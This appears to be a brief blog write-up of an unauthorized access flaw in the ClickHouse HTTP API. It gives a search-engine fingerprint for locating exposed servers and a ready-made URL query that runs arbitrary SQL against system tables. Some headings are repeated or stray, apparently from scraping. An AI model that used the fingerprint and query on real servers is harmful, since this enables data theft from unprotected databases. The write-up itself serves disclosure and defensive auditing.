Clickhouse Api Database Interface Unauthorized Access Vulnerability
Clickhouse Api Database Interface Unauthorized Access Vulnerability
ClickHouse API Database Interface Unauthorized Access Vulnerability
Vulnerability Description
The ClickHouse API database interface has an unauthorized access vulnerability. An attacker can execute any SQL command to obtain database data.
Vulnerability Impact
ClickHouse
Network surveying and mapping
“ClickHouse” && body=”ok”
Vulnerability reappears
Login page
Execute SQL statements
1
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
This post is licensed under CC BY 4.0 by the author.